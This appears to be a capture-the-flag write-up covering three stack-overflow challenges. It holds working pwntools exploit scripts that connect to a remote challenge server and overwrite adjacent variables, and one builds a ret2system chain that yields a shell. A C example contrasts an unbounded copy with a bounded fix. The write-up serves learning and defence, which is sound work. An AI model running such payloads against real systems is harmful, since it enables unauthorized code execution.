When v5 equals 1926 the flag is returned. The second input is stored in v4, which is only 8 bytes below v5, so once our input exceeds 8 bytes it overwrites v5.
EXP
from pwn import *
#sh = process("./when_did_you_born")   # local test target; the remote line below is used
sh = remote("111.198.29.45", 40573)
# 8 bytes fill v4, the following 8 bytes land on v5 (bytes so it also runs on Python 3)
payload = b"a"*8 + p64(1926)
sh.recvuntil(b"Birth?\n")
sh.sendline(b"hhh")
sh.recvuntil(b"Name?\n")
sh.sendline(payload)
sh.interactive()
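The root cause behind this payload is a copy that is bounded by something other than the destination field. The following C is an added example, not code from the writeup or the challenge binary; the frame layout is an assumption that mirrors the description above (an 8-byte name buffer directly below the 4-byte value compared with 1926). It shows a simulated unbounded copy reaching the check value, and the bounded copy that keeps the same input from ever touching it.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed frame mirroring the layout the writeup describes (assumption:
 * the real binary's frame is not on the page): an 8-byte name buffer sits
 * directly below the 4-byte value compared against 1926, so bytes 8..11 of
 * the input land on the check value. */
struct frame {
    char     name[8];
    uint32_t birth_year;
};

#define WIN_YEAR 1926u

/* Unbounded pattern, simulated: the copy is limited by the size of the whole
 * frame rather than by the name field, which is the defect gets() or
 * read(0, name, big) introduces.  Copying through &f keeps the simulation
 * inside one object, so it stays well-defined C. */
int check_birth_unbounded(const unsigned char *input, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, input, len);               /* bound is sizeof f, not sizeof f.name */
    return f.birth_year == WIN_YEAR;
}

/* Hardened pattern: the copy is bounded by the destination field and the
 * buffer is always NUL-terminated, so no input length can reach birth_year.
 * The truncated name is copied to name_out so callers can see what survived. */
int check_birth_bounded(const unsigned char *input, size_t len,
                        char *name_out, size_t name_out_len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    size_t n = len < sizeof f.name - 1 ? len : sizeof f.name - 1;
    memcpy(f.name, input, n);
    f.name[n] = '\0';
    if (name_out != NULL && name_out_len > 0)
        snprintf(name_out, name_out_len, "%s", f.name);
    return f.birth_year == WIN_YEAR;
}

/* Build the 12 bytes of the writeup's input that matter ("a"*8 followed by
 * 1926 as a dword) in host byte order.  Returns the length written, or 0
 * if out is too small. */
size_t build_probe(unsigned char *out, size_t out_len)
{
    uint32_t year = WIN_YEAR;
    if (out_len < 8 + sizeof year)
        return 0;
    memset(out, 'a', 8);
    memcpy(out + 8, &year, sizeof year);
    return 8 + sizeof year;
}

int main(void)
{
    unsigned char probe[16];
    char name[16];
    size_t n = build_probe(probe, sizeof probe);
    printf("unbounded copy: check reached = %d\n", check_birth_unbounded(probe, n));
    printf("bounded copy:   check reached = %d, name kept = \"%s\"\n",
           check_birth_bounded(probe, n, name, sizeof name), name);
    return 0;
}
```

The bounded version is the fix to look for in review: the length passed to the copy is derived from `sizeof` the destination field, and the buffer is terminated regardless of input length, so the adjacent variable is unreachable no matter how long the name is.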
When dword_60106c equals 1853186401 the system function is called, and dword_60106c is only 4 bytes past the address that read writes the user input to, so input longer than 4 bytes overwrites it.
EXP
from pwn import *
#sh = process("./hello_pwn")
sh = remote("111.198.29.45", 45344)
# 4 bytes fill the input buffer, then the value lands on dword_60106c
# (p64 writes 8 bytes; only the low dword is compared)
payload = b"a"*4 + p64(1853186401)
sh.recvuntil(b"bof\n")
sh.sendline(payload)
sh.interactive()
system function, so once the /bin/sh string is also found, a shell can be obtained.
EXP
from pwn import *
#sh = process("./level2")   # local test target; the remote line below is used
sh = remote("111.198.29.45", 50653)
elf = ELF("./level2")
main = 0x08048480
system = elf.sym["system"]
binsh = 0x0804a024
# 140 bytes reach the saved return address; then system, a return address
# for system (main), and system's argument (/bin/sh) in 32-bit calling convention
payload = b"a"*140
payload += p32(system) + p32(main) + p32(binsh)
sh.recvuntil(b"nput:\n")
sh.sendline(payload)
sh.interactive()